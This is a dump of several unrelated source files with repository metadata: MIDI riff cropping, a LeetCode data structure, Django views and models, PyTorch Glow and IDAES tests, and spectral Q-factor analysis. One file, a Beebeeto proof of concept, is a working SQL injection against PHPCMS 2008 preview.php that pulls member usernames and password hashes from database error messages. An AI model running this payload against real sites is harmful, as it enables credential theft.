        bass_riff = BassRiff(path)
        cropped_riffs = bass_riff.crop_by_measure()
        if not os.path.exists(path[:-4]):
            os.mkdir(path[:-4])
        for measure in range(bass_riff.measures_num):
            cropped = cropped_riffs[measure]
            save_path = path[:-4] + '/' + str(measure) + '.mid'
            cropped.write(path[:-4] + '/' + str(measure) + '.mid')
            unit_briff_table.insert_one({
                'Performer': briff['Performer'],
                'Album': briff['Album'],
                'Song': briff['Song'],
                'Path': save_path,
                'Tonality': measures_tonality[measure]
            })
def test_crop():
    """Manual smoke test: crop one hard-coded riff into per-measure files.

    NOTE(review): calls os.mkdir unconditionally, so a second run raises
    FileExistsError once the directory already exists.
    """
    path = 'E:/grunge_library/Soundgarden/Superunknown/03 - Fell on Black Days/RIFF/4.mid'
    guitar_riff = GuitarRiff(path)
    cropped_riffs = guitar_riff.crop_by_measure()
    os.mkdir(path[:-4])
    for measure in range(guitar_riff.measures_num):
        cropped = cropped_riffs[measure]
        cropped.write(path[:-4] + '/' + str(measure) + '.mid')
if __name__ == '__main__':
crop_riffs() | [
"dingzhx@vip.qq.com"
] | dingzhx@vip.qq.com |
386d192a0ec7ee09139f82edbcdcc3242ee5d609 | 4766d241bbc736e070f79a6ae6a919a8b8bb442d | /archives/leetcode/0380. Insert Delete GetRandom O(1).py | 49e6f76ec6d3d7f929204d444413ca284bb1fee3 | [] | no_license | yangzongwu/leetcode | f7a747668b0b5606050e8a8778cc25902dd9509b | 01f2edd79a1e922bfefecad69e5f2e1ff3a479e5 | refs/heads/master | 2021-07-08T06:45:16.218954 | 2020-07-18T10:20:24 | 2020-07-18T10:20:24 | 165,957,437 | 10 | 8 | null | null | null | null | UTF-8 | Python | false | false | 2,588 | py | '''
Design a data structure that supports all following operations in average O(1) time.
insert(val): Inserts an item val to the set if not already present.
remove(val): Removes an item val from the set if present.
getRandom: Returns a random element from current set of elements. Each element must have the same probability of being returned.
Example:
// Init an empty set.
RandomizedSet randomSet = new RandomizedSet();
// Inserts 1 to the set. Returns true as 1 was inserted successfully.
randomSet.insert(1);
// Returns false as 2 does not exist in the set.
randomSet.remove(2);
// Inserts 2 to the set, returns true. Set now contains [1,2].
randomSet.insert(2);
// getRandom should return either 1 or 2 randomly.
randomSet.getRandom();
// Removes 1 from the set, returns true. Set now contains [2].
randomSet.remove(1);
// 2 was already in the set, so return false.
randomSet.insert(2);
// Since 2 is the only number in the set, getRandom always return 2.
randomSet.getRandom();
'''
class RandomizedSet(object):
    """Set with average O(1) insert, remove and uniform random selection.

    Invariant: datadict maps each stored value to its index in datalist,
    so membership tests, removals and random picks are all O(1).
    """

    def __init__(self):
        """
        Initialize your data structure here.
        """
        self.datalist = []   # values, contiguous, for O(1) random access
        self.datadict = {}   # value -> index of that value in datalist

    def insert(self, val):
        """
        Inserts a value to the set. Returns true if the set did not already contain the specified element.
        :type val: int
        :rtype: bool
        """
        if val in self.datadict:
            return False
        else:
            self.datadict[val] = len(self.datalist)
            self.datalist.append(val)
            return True

    def remove(self, val):
        """
        Removes a value from the set. Returns true if the set contained the specified element.
        :type val: int
        :rtype: bool
        """
        # Bug fix: membership must be tested against the dict; the original
        # scanned the *list*, making remove O(n) and defeating the point of
        # keeping the value->index map.
        if val not in self.datadict:
            return False
        else:
            if self.datalist[-1] == val:
                # val is already the tail element: just drop it.
                self.datalist.pop()
                del self.datadict[val]
            else:
                # Swap-with-last: move the tail element into val's slot so
                # the list stays contiguous, then pop the tail.
                cur_position = self.datadict[val]
                last_val = self.datalist.pop()
                del self.datadict[val]
                self.datadict[last_val] = cur_position
                self.datalist[cur_position] = last_val
            return True

    def getRandom(self):
        """
        Get a random element from the set.
        :rtype: int
        """
        return random.choice(self.datalist)
# Your RandomizedSet object will be instantiated and called as such:
# obj = RandomizedSet()
# param_1 = obj.insert(val)
# param_2 = obj.remove(val)
# param_3 = obj.getRandom()
| [
"noreply@github.com"
] | yangzongwu.noreply@github.com |
30b607ac4c0ea0c052d4efeeabd5863ce8ad5d02 | 854394f4148e7bee8cd3c6d2a01e97ffbf772103 | /0x0A-python-inheritance/100-my_int.py | 4c939bd416117895b5cbd983bf6c85632d952eed | [] | no_license | garethbrickman/holbertonschool-higher_level_programming | cb3ccb864102d62af72b5e86d53638bd899bfabb | 05d65c6c89008cb70cbc1ada5bb9c8ed7a2733e9 | refs/heads/master | 2021-07-10T08:32:23.397388 | 2020-10-15T18:40:55 | 2020-10-15T18:40:55 | 207,379,469 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 205 | py | #!/usr/bin/python3
"""
Class for MyInt
"""
class MyInt(int):
"""Defines base class"""
def __init__(self, int):
"""Instantiation"""
super().__init__()
self.int = int
| [
"977@holbertonschool.com"
] | 977@holbertonschool.com |
d41e07b6b493159c8e8f0b0dbd4c5a75389917d1 | e77a3618d0afe63a2f00d87b61c3f19d3eba10d8 | /plugins/beebeeto/poc_2014_0115.py | dc729f19c5425e035250f73a0c2b0ebc24b7ef11 | [] | no_license | Explorer1092/coco | b54e88a527b29209de7c636833ac5d102514291b | 15c5aba0972ac68dc4c874ddacf5986af5ac2a64 | refs/heads/master | 2020-05-31T07:03:19.277209 | 2019-01-29T14:36:45 | 2019-01-29T14:36:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,141 | py | #!/usr/bin/env python
# coding=utf-8
"""
Site: http://www.beebeeto.com/
Framework: https://github.com/n0tr00t/Beebeeto-framework
"""
import re
import urllib2
from baseframe import BaseFrame
class MyPoc(BaseFrame):
    """PoC for an error-based SQL injection in PHPCMS 2008 /preview.php.

    NOTE(review): Python 2 code (print statement, urllib2).
    """

    poc_info = {
        # PoC metadata
        'poc': {
            'id': 'poc-2014-0115',
            'name': 'PHPCMS 2008 /preview.php SQL注入漏洞 POC',
            'author': '1024',
            'create_date': '2014-10-25',
        },
        # protocol information
        'protocol': {
            'name': 'http',
            'port': [80],
            'layer4_protocol': ['tcp'],
        },
        # vulnerability information
        'vul': {
            'app_name': 'PHPCMS',
            'vul_version': ['2008'],
            'type': 'SQL Injection',
            'tag': ['PHPCMS漏洞', 'SQL注入漏洞', '/preview.php', 'php'],
            'desc': 'N/A',
            'references': ['http://www.wooyun.org/bugs/wooyun-2013-022112',
                           ],
        },
    }

    @classmethod
    def verify(cls, args):
        """Probe the target and scrape credentials from the SQL error text.

        The payload triggers MySQL's duplicate-entry error whose message
        embeds '~username:password~'; a regex match marks the target
        vulnerable and stores the captured credentials in poc_ret.
        """
        payload = ("/preview.php?info[catid]=15&content=a[page]b&info[contentid]=2'%20and%20(select%201%20from("
                   "select%20count(*),concat((select%20(select%20(select%20concat(0x7e,0x27,username,0x3a,password,"
                   "0x27,0x7e)%20from%20phpcms_member%20limit%200,1))%20from%20information_schema.tables%20limit%200"
                   ",1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)--%20a")
        verify_url = args['options']['target'] + payload
        req = urllib2.Request(verify_url)
        if args['options']['verbose']:
            print '[*] Request URL: ' + verify_url
        content = urllib2.urlopen(req).read()
        reg = re.compile("Duplicate entry '~'(.*?)'~1' for key 'group_key'")
        res = reg.findall(content)
        if res:
            args['success'] = True
            args['poc_ret']['vul_url'] = verify_url
            args['poc_ret']['Admin_pwd'] = res[0]
        return args

    # Exploitation is identical to verification for this error-based injection.
    exploit = verify
if __name__ == '__main__':
from pprint import pprint
mp = MyPoc()
pprint(mp.run()) | [
"834430486@qq.com"
] | 834430486@qq.com |
33c640404f61f1578eabdb131983ea14b43007c2 | 93a13468fd34692ca58ec5aad8f923a5097a19a5 | /users/views.py | e2150174780cec0192b483daaa9b2f09e459b8a2 | [] | no_license | Ryanden/AirBnB-Clone | 0734735a5f1e38b2670db12a4aeb81a2ccb8dc71 | a9be3a6f2cda3c11f036c5f8a31b0c972ed77905 | refs/heads/master | 2023-04-29T07:10:10.177262 | 2021-02-16T13:48:33 | 2021-02-16T13:48:33 | 232,119,018 | 0 | 0 | null | 2023-04-21T21:14:19 | 2020-01-06T14:32:18 | Python | UTF-8 | Python | false | false | 1,532 | py | from django.views import View
from django.views.generic import FormView
from django.shortcuts import render, redirect, reverse
from django.contrib.auth import authenticate, login, logout
from django.urls import reverse_lazy
from . import forms
class LoginView(View):
    """Render the login form (GET) and authenticate posted credentials (POST)."""

    def get(self, request):
        # Blank form for the initial page load.
        form = forms.LoginForm()
        return render(request, "users/login.html", {"form": form})

    def post(self, request):
        form = forms.LoginForm(request.POST)
        if form.is_valid():
            email = form.cleaned_data.get("email")
            password = form.cleaned_data.get("password")
            # The auth backend here uses the e-mail address as the username.
            user = authenticate(request, username=email, password=password)
            if user is not None:
                login(request, user)
                return redirect(reverse("core:home"))
        # Invalid form or bad credentials: redisplay the login page.
        return render(request, "users/login.html", {"form": form})
def log_out(request):
    """Log the current user out and redirect to the home page."""
    logout(request)
    return redirect(reverse("core:home"))
class SignUpView(FormView):
    """Sign-up form that creates the user and logs them straight in."""

    template_name = "users/signup.html"
    form_class = forms.SignUpForm
    success_url = reverse_lazy("core:home")
    # NOTE(review): hard-coded development defaults — remove for production.
    initial = {"first_name": "test", "last_name": "guest", "email": "test@gmail.com"}

    def form_valid(self, form):
        # Persist the new user, then authenticate with the raw credentials
        # from the validated form so the session starts logged in.
        form.save()
        email = form.cleaned_data.get("email")
        password = form.cleaned_data.get("password")
        user = authenticate(self.request, username=email, password=password)
        if user is not None:
            login(self.request, user)
        return super().form_valid(form)
| [
"lockstom@gmail.com"
] | lockstom@gmail.com |
b53e1d637c5aada77f90884734c81edc8fe7d932 | d5bc5ad0aa9276c661adfffe0acbe8b3211b39e4 | /torch_glow/tests/functionality/quantized_cut_in_the_middle_test.py | 5b9260be64fc135f8e6585d3c9cf1b5472c2371b | [
"Apache-2.0"
] | permissive | xw285cornell/glow | b3ec6f84be6485e5b55550c97566d11512e92167 | 90b5badcf583c0cdd880d263a687ae387bcbbb72 | refs/heads/master | 2022-12-06T05:49:09.743232 | 2020-09-04T07:34:59 | 2020-09-04T07:36:17 | 292,919,567 | 0 | 0 | Apache-2.0 | 2020-09-04T18:28:14 | 2020-09-04T18:28:13 | null | UTF-8 | Python | false | false | 2,078 | py | # isort:skip_file
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch_glow
import torch
from tests.utils import GLOW_NODE_NAME
class TestQuantizedCut(unittest.TestCase):
    def test_quantized_cut(self):
        """Test cut quantized chunk in the middle."""
        # Disable the profiling executor so tracing yields a stable graph.
        torch._C._jit_set_profiling_executor(False)
        torch._C._jit_set_profiling_mode(False)

        def fun(a, b, c, d):
            # Quantize all four inputs, combine them with quantized adds,
            # and dequantize at the end.
            q = torch.nn.quantized.Quantize(
                scale=1.0 / 21, zero_point=0, dtype=torch.quint8
            )
            dq = torch.nn.quantized.DeQuantize()
            a = q(a)
            b = q(b)
            c = q(c)
            d = q(d)
            adds = torch.ops.quantized.add(a, b, scale=1.0 / 17, zero_point=5)
            adds2 = torch.ops.quantized.add(c, d, scale=1.0 / 14, zero_point=4)
            res = torch.ops.quantized.add_relu(
                adds, adds2, scale=1.0 / 18, zero_point=6
            )
            res = torch.ops.quantized.add(res, res, scale=1.0 / 13, zero_point=7)
            res = dq(res)
            return res

        with torch.no_grad():
            a = torch.randn([5, 5])
            b = torch.randn([5, 5])
            c = torch.randn([5, 5])
            d = torch.randn([5, 5])
            res_torch = fun(a, b, c, d)
            torch_glow.enableFusionPass()
            # Cut using blacklist functionality
            blacklist = ["quantized::add_relu"]
            torch_glow.setFusionBlacklist(blacklist)
            traced_model = torch.jit.trace(fun, (a, b, c, d))
            for node in traced_model.graph_for(a, b, c, d).nodes():
                kind = node.kind()
                # Make sure the blacklist is working: every node is either a
                # fused Glow subgraph, a blacklisted op left behind, or a constant.
                assert (
                    kind == GLOW_NODE_NAME
                    or kind in blacklist
                    or kind == "prim::Constant"
                )
            res_glow = traced_model(a, b, c, d)
            print(res_torch)
            print(res_glow)
            # Numerical results must agree between eager PyTorch and Glow.
            assert torch.allclose(res_torch, res_glow)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
be81e9c26fcc8071cfffa694007f998c4194f36b | 4f0a7a6942003a928037a68ac7ba6f1afb5c30c7 | /mysite/api/serializers.py | 5f3243b80ddf585f0dd9f12f458ec4edf4c4458d | [] | no_license | UPstartDeveloper/learn-django-live | 20230fb1930420bbc9c5b12a50659a9476ab830d | 94f6eea08de321b1cc41c17571cf36bdb5ee9a7e | refs/heads/master | 2023-05-06T10:18:14.990145 | 2022-04-29T15:31:15 | 2022-04-29T15:31:15 | 216,932,883 | 0 | 0 | null | 2023-04-21T20:41:16 | 2019-10-23T00:18:09 | Python | UTF-8 | Python | false | false | 319 | py | from rest_framework.serializers import ModelSerializer
from polls.models import Question, Choice
class QuestionSerializer(ModelSerializer):
    """Serialize every field of the polls Question model."""
    class Meta:
        model = Question
        fields = '__all__'


class ChoiceSerializer(ModelSerializer):
    """Serialize every field of the polls Choice model."""
    class Meta:
        model = Choice
        fields = '__all__'
| [
"zainr7989@gmail.com"
] | zainr7989@gmail.com |
3f6b69f20b7796bfb25dcb7c59db2b97b1d8faf1 | 1ab903cf2e439919e208db6a1ea85b95fc447eb6 | /classifier_preprocessor_quality_factor.py | 041d0557ef44914a9d67d98ee552072f9081c777 | [] | no_license | shanonentropy/photonic_thermometer_intake_module | 7156e91a7e38e9f1413f1edfe6308ac773fd9613 | d3ff7b967ae6ea072bd1edc0718fe662d67b3d07 | refs/heads/main | 2023-08-25T06:26:40.189162 | 2021-10-04T18:14:38 | 2021-10-04T18:14:38 | 413,526,266 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,031 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Nov 26 10:38:27 2019
@author: zahmed
this program is part of the SENSOR_CLASSIFIER program's pre-processing routine
it will take in all the data from the sensor folder and display it
"""
import os
import pandas as pd
from sklearn.preprocessing import minmax_scale
from scipy import interpolate
from scipy.interpolate import splrep, sproot
import numpy as np
import matplotlib.pyplot as plt
#path to directory with the relevant files
path_dir = r'C:\Interpolation_Project\classification\fbg_classification'
#loop over the files and then create a list of file names to later iterate over
''' for each spectra we need to extract the following set of information
number of peaks
if more than one peak, peak-to-peak distace (ppd) and delta ppd
Q of the device
from the normalized spectra, skewness
and intensity of profile of the spectra
the first part is to just feed in data with profile and label and
see if the classifier works, if not, keep adding more features
so this program will just take in the data, fit it, create a dataset with
known pitch of 0.003 nm and output data ninmax scaled profile data with the
same name
'''
# For every spectrum file in path_dir: fit a smoothing spline, resample on a
# fixed 0.003 nm pitch, and estimate the quality factor Q = lambda_c / FWHM
# from the half-maximum crossings of the resampled profile.
file_names = []
Q = []
cols = ['x', 'y']
for fname in os.listdir(path_dir):
    file_names.append(fname)
    print(fname)
    file_path = (os.path.join(path_dir, fname))
    df = pd.read_csv(file_path, sep = '\t', header = 4, engine = 'python', names =cols )
    df.sort_values(by='x', ascending =True, inplace = True)
    df.drop_duplicates( inplace =True)
#    df.plot('x','y')
#    m = df.x.count()
#    s_val = 1/(m - np.sqrt(2*m))
    tck = interpolate.splrep(df.x,df.y,s=0.0000001) # s =m-sqrt(2m) where m= #datapts and s is smoothness factor
    x_ = np.arange (df.x.min(),df.x.max(), 0.003)
    y_ = interpolate.splev(x_, tck, der=0)
#    plt.plot(df['x'],df['y'])
#    plt.scatter(x_,y_)
#    plt.show()
    # Half-maximum level of the resampled profile.
    HM =(np.max(y_)-np.min(y_))/2
    w = splrep(x_, y_ - HM, k=3)
#    print(sproot(w_j))
    try:
        # NOTE(review): this assumes exactly two half-maximum crossings; an
        # even count other than 2 (0, 4, ...) makes the unpack below raise
        # ValueError, which is swallowed by the except clause.
        if len(sproot(w))%2 == 0:
            r1 , r2 = sproot(w)
#            print(r1, r2)
            FWHM = np.abs(r1 - r2)
#            print('FWHM=',FWHM)
            center_wavelength = r1 + FWHM/2
            Q.append(center_wavelength/FWHM)
    except (TypeError, ValueError):
        print(fname,'error')
        continue
    df1 = pd.DataFrame(y_, x_)
#    print(df1.head(3))
#    df1['x_scale'] = minmax_scale(x_, feature_range=(0,1))
#    df1['y_scale'] = minmax_scale(y_, feature_range=(0,1))
#    plt.plot(df1['x_scale'], df1['y_scale'])
#    df1.reset_index(inplace=True)
#    df1.drop('index', axis=1, inplace=True)
#    df2 = df1[['x_scale', 'y_scale']]
#    print(df2.head(3))
#    tmp = df2[['x_scale', 'y_scale']].transpose()
#    tmp = pd.DataFrame(tmp.loc['y_scale'].T).T
#    print(tmp)
#    tmp.to_csv(fname)
# NOTE(review): files that hit the except branch were already appended to
# file_names but contribute no Q entry, so the two lists can differ in
# length and the DataFrame below would then raise — confirm intended.
# (The 'filnames' key typo is preserved for compatibility.)
df_q = pd.DataFrame({'filnames':file_names, 'quality_factor':Q})
df_q.to_csv('quality_factor')
| [
"noreply@github.com"
] | shanonentropy.noreply@github.com |
1500a3650158cc07514dfc13b7275ebab2abb595 | 15c04e143e7b411e3020cf68eae4d6fbefa73c4b | /idaes/apps/caprese/tests/test_nmpc_constructor_4.py | 14a73fdc3ff7cc4ad9620af5e01d0088e5bdcc5a | [
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | ryder-shallbetter/idaes-pse | 57f272506edc9d1bce851680b8e451e64d08a90c | eed7790869d2859e92f0b3dd8ea3ebe8c9f0462c | refs/heads/master | 2022-12-09T07:10:44.905376 | 2020-09-04T23:00:39 | 2020-09-04T23:00:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,693 | py | ##############################################################################
# Institute for the Design of Advanced Energy Systems Process Systems
# Engineering Framework (IDAES PSE Framework) Copyright (c) 2018-2019, by the
# software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia
# University Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.txt and LICENSE.txt for full copyright and
# license information, respectively. Both files are also available online
# at the URL "https://github.com/IDAES/idaes-pse".
##############################################################################
"""
Test for Cappresse's module for NMPC.
"""
import pytest
from pyomo.environ import (Block, ConcreteModel, Constraint, Expression,
Set, SolverFactory, Var, value,
TransformationFactory, TerminationCondition)
from pyomo.network import Arc
from pyomo.kernel import ComponentSet
from idaes.core import (FlowsheetBlock, MaterialBalanceType, EnergyBalanceType,
MomentumBalanceType)
from idaes.core.util.model_statistics import (degrees_of_freedom,
activated_equalities_generator)
from idaes.core.util.initialization import initialize_by_time_element
from idaes.core.util.exceptions import ConfigurationError
from idaes.generic_models.unit_models import CSTR, Mixer, MomentumMixingType
from idaes.apps.caprese import nmpc
from idaes.apps.caprese.nmpc import *
from idaes.apps.caprese.examples.cstr_model import make_model
import idaes.logger as idaeslog
__author__ = "Robert Parker"
# See if ipopt is available and set up solver
if SolverFactory('ipopt').available():
solver = SolverFactory('ipopt')
solver.options = {'tol': 1e-6,
'mu_init': 1e-8,
'bound_push': 1e-8}
else:
solver = None
def assert_categorization(model):
    """Check that NMPC variable categorization matches the expected sets.

    Builds the expected input / derivative / differential / fixed /
    algebraic / initial-condition variable sets for the CSTR+mixer
    flowsheet at t=0 and asserts that model._NMPC_NAMESPACE has grouped
    every time-indexed variable accordingly.
    """
    init_input_set = ComponentSet([model.mixer.S_inlet.flow_vol[0],
                                   model.mixer.E_inlet.flow_vol[0]])
    init_deriv_list = []
    init_diff_list = []
    init_fixed_list = [
        model.mixer.E_inlet.temperature[0],
        model.mixer.S_inlet.temperature[0],
        model.cstr.control_volume.energy_holdup[0, 'aq'],
        model.cstr.control_volume.material_accumulation[0, 'aq', 'E'],
        ]
    init_ic_list = [
        model.cstr.control_volume.material_holdup[0, 'aq', 'S'],
        model.cstr.control_volume.material_holdup[0, 'aq', 'C'],
        model.cstr.control_volume.material_holdup[0, 'aq', 'P'],
        model.cstr.control_volume.volume[0],
        ]
    init_alg_list = [
        model.cstr.control_volume.volume[0],
        model.cstr.outlet.flow_vol[0],
        model.cstr.outlet.temperature[0],
        model.cstr.inlet.flow_vol[0],
        model.cstr.inlet.temperature[0],
        model.mixer.outlet.flow_vol[0],
        model.mixer.outlet.temperature[0],
        model.cstr.control_volume.energy_accumulation[0, 'aq'],
        model.cstr.control_volume.material_holdup[0, 'aq', 'E'],
        ]
    # Per-component expected membership (the 'Solvent' outlet concentrations
    # are fixed rather than algebraic).
    for j in model.properties.component_list:
        init_deriv_list.append(
            model.cstr.control_volume.material_accumulation[0, 'aq', j])
        init_diff_list.append(
            model.cstr.control_volume.material_holdup[0, 'aq', j])
        init_fixed_list.append(model.mixer.E_inlet.conc_mol[0, j])
        init_fixed_list.append(model.mixer.S_inlet.conc_mol[0, j])
        init_alg_list.extend([
            model.cstr.control_volume.properties_out[0].flow_mol_comp[j],
            model.cstr.inlet.conc_mol[0, j],
            model.cstr.control_volume.properties_in[0].flow_mol_comp[j],
            model.cstr.control_volume.rate_reaction_generation[0, 'aq', j],
            model.mixer.mixed_state[0].flow_mol_comp[j],
            model.mixer.E_inlet_state[0].flow_mol_comp[j],
            model.mixer.S_inlet_state[0].flow_mol_comp[j],
            ])
        if j != 'Solvent':
            init_alg_list.append(model.mixer.outlet.conc_mol[0, j])
            init_alg_list.append(model.cstr.outlet.conc_mol[0, j])
        else:
            init_fixed_list.append(model.cstr.outlet.conc_mol[0, j])
            init_fixed_list.append(model.mixer.outlet.conc_mol[0, j])
    for r in model.reactions.rate_reaction_idx:
        init_alg_list.extend([
            model.cstr.control_volume.reactions[0].reaction_coef[r],
            model.cstr.control_volume.reactions[0].reaction_rate[r],
            model.cstr.control_volume.rate_reaction_extent[0, r]
            ])
    init_deriv_set = ComponentSet(init_deriv_list)
    init_diff_set = ComponentSet(init_diff_list)
    init_fixed_set = ComponentSet(init_fixed_list)
    init_ic_set = ComponentSet(init_ic_list)
    init_alg_set = ComponentSet(init_alg_list)
    # Every categorized variable must appear in the matching expected set,
    # and the category sizes must agree exactly.
    assert model._NMPC_NAMESPACE.input_vars.n_vars == len(init_input_set)
    for v in model._NMPC_NAMESPACE.input_vars:
        assert v[0] in init_input_set
    assert model._NMPC_NAMESPACE.deriv_vars.n_vars == len(init_deriv_set)
    for v in model._NMPC_NAMESPACE.deriv_vars:
        assert v[0] in init_deriv_set
    assert len(model._NMPC_NAMESPACE.diff_vars) == len(init_deriv_set)
    for v in model._NMPC_NAMESPACE.diff_vars:
        assert v[0] in init_diff_set
    assert len(model._NMPC_NAMESPACE.fixed_vars) == len(init_fixed_set)
    for v in model._NMPC_NAMESPACE.fixed_vars:
        assert v[0] in init_fixed_set
    assert len(model._NMPC_NAMESPACE.alg_vars) == len(init_alg_set)
    for v in model._NMPC_NAMESPACE.alg_vars:
        assert v[0] in init_alg_set
    assert len(model._NMPC_NAMESPACE.ic_vars) == len(init_ic_set)
    for v in model._NMPC_NAMESPACE.ic_vars:
        assert v[0] in init_ic_set
    assert len(model._NMPC_NAMESPACE.scalar_vars) == 0
    # All categorized variables must be indexed by the namespace's time set.
    for var in model._NMPC_NAMESPACE.deriv_vars:
        assert len(var) == len(model._NMPC_NAMESPACE.get_time())
        assert var.index_set() is model._NMPC_NAMESPACE.get_time()
    for var in model._NMPC_NAMESPACE.alg_vars:
        assert len(var) == len(model._NMPC_NAMESPACE.get_time())
        assert var.index_set() is model._NMPC_NAMESPACE.get_time()
@pytest.mark.component
def test_constructor_4():
    """Construct an NMPCSim with some accumulation terms held at zero.

    Fixes the energy and 'E' material accumulation variables in the
    controller model (pseudo-steady state for those states), unfixes the
    corresponding holdup initial conditions, deactivates the matching
    discretization equations, then builds the NMPCSim.
    """
    m_plant = make_model(horizon=6, ntfe=60, ntcp=2)
    m_controller = make_model(horizon=3, ntfe=30, ntcp=2)
    sample_time = 0.5
    # Six samples per horizon, five elements per sample
    initial_plant_inputs = [m_plant.fs.mixer.S_inlet.flow_vol[0],
                            m_plant.fs.mixer.E_inlet.flow_vol[0]]
    # Fix some derivative vars, as in pseudo-steady state
    # Controller model only
    for t in m_controller.fs.time:
        m_controller.fs.cstr.control_volume.\
            energy_accumulation[t, 'aq'].fix(0)
        m_controller.fs.cstr.control_volume.\
            material_accumulation[t, 'aq', 'E'].fix(0)
    m_controller.fs.cstr.control_volume.\
        energy_holdup[0, 'aq'].unfix()
    m_controller.fs.cstr.control_volume.\
        material_holdup[0, 'aq', 'E'].unfix()
    m_controller.fs.cstr.control_volume.\
        energy_accumulation_disc_eq.deactivate()
    m_controller.fs.cstr.control_volume.\
        material_accumulation_disc_eq.deactivate()
    nmpc = NMPCSim(m_plant.fs, m_plant.fs.time,
                   m_controller.fs, m_controller.fs.time,
                   inputs_at_t0=initial_plant_inputs,
                   solver=solver, outlvl=idaeslog.DEBUG,
                   sample_time=sample_time)
if __name__ == '__main__':
test_constructor_4()
| [
"KSBeattie@lbl.gov"
] | KSBeattie@lbl.gov |
94857daf8736ce503d5898c9038a404167adde62 | 5d4158f1afa78f0a057c4e78846a918a1d4d3404 | /backend/dating/models.py | a0eec889f555525faa2e5a8a65b4854827a6acdf | [] | no_license | crowdbotics-apps/ayou-20920 | 08c1c10a73a134a53449b8688634564ed5293a21 | 0b51e4eacf271f8a956c530cdad52c57a2fa6f88 | refs/heads/master | 2022-12-18T05:33:07.601092 | 2020-10-01T03:51:32 | 2020-10-01T03:51:32 | 300,129,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,637 | py | from django.conf import settings
from django.db import models
class Profile(models.Model):
    """Generated model: profile data attached one-to-one to a user."""
    bio = models.TextField()
    school = models.TextField()
    date_of_birth = models.DateField()
    # auto_now_add / auto_now give creation vs. last-modified dates.
    created = models.DateField(
        auto_now_add=True,
    )
    modified = models.DateField(
        auto_now=True,
    )
    user = models.OneToOneField(
        "users.User",
        null=True,
        blank=True,
        on_delete=models.CASCADE,
        related_name="profile_user",
    )


class UserPhoto(models.Model):
    """Generated model: a photo URL belonging to a user."""
    user = models.ForeignKey(
        "users.User",
        on_delete=models.CASCADE,
        related_name="userphoto_user",
    )
    photo = models.URLField()


class Setting(models.Model):
    """Generated model: per-user discovery and notification preferences."""
    maximum_distance = models.IntegerField()
    gender = models.CharField(
        max_length=256,
    )
    age_range = models.IntegerField()
    show_me_on_searches = models.BooleanField()
    new_matches_notification = models.BooleanField()
    message_notification = models.BooleanField()
    message_likes_notification = models.BooleanField()
    super_like_notification = models.BooleanField()
    in_app_vibrations = models.BooleanField()
    user = models.ForeignKey(
        "users.User",
        null=True,
        blank=True,
        on_delete=models.CASCADE,
        related_name="setting_user",
    )


class Dislike(models.Model):
    """Generated model: links an owner to a disliked user."""
    owner = models.ForeignKey(
        "users.User",
        on_delete=models.CASCADE,
        related_name="dislike_owner",
    )
    user = models.ForeignKey(
        "users.User",
        on_delete=models.CASCADE,
        related_name="dislike_user",
    )


class Like(models.Model):
    """Generated model: links an owner to a liked user, with super-like flag."""
    owner = models.ForeignKey(
        "users.User",
        on_delete=models.CASCADE,
        related_name="like_owner",
    )
    user = models.ForeignKey(
        "users.User",
        on_delete=models.CASCADE,
        related_name="like_user",
    )
    super_liked = models.BooleanField()


class Inbox(models.Model):
    """Generated model: slug-addressed container with a creation timestamp."""
    slug = models.SlugField(
        max_length=50,
    )
    created = models.DateTimeField(
        auto_now_add=True,
    )


class Match(models.Model):
    """Generated model: links a user and an owner with a creation timestamp."""
    user = models.ForeignKey(
        "users.User",
        on_delete=models.CASCADE,
        related_name="match_user",
    )
    owner = models.ForeignKey(
        "users.User",
        on_delete=models.CASCADE,
        related_name="match_owner",
    )
    created = models.DateTimeField(
        auto_now_add=True,
    )
# Create your models here.
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
4b85b79664d408e8e59f8668f2192d221940e4a3 | fcc25875b877510d5603fccfd0b85dbac58fa8d9 | /app/migrations/0003_auto_20170802_1443.py | 07ffea30903d1e974b645322a9555bd034f418b0 | [] | no_license | kmjnhb/repo | be44e0d7a685aae140e581a5b8c0935a8ddf0d7b | ac3cb388f87f2188900beac956dee6c701aaa556 | refs/heads/master | 2021-01-02T08:55:48.242512 | 2017-08-06T19:37:53 | 2017-08-06T19:37:53 | 99,100,726 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 996 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-02 14:43
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Adds the ``Manager`` model and a ``Client.is_client`` flag."""

    dependencies = [
        # The user model is swappable, so depend on whatever AUTH_USER_MODEL
        # resolves to at migration time.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('app', '0002_auto_20170802_1055'),
    ]

    operations = [
        migrations.CreateModel(
            name='Manager',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('is_manager', models.BooleanField(default=False)),
                # One Manager row per user; deleting the user removes the row.
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.AddField(
            model_name='client',
            name='is_client',
            field=models.BooleanField(default=False),
        ),
    ]
| [
"you@example.com"
] | you@example.com |
b6fee919c70d1e39c2b3d355b1d28e92deee5f0f | 4538a25701f9f108278036ab520a81dcb0de15fe | /non-euclidean/poincare_disk.py | 3b4db43c4f79cbcb2967125f2771ddae7b9111fc | [
"MIT"
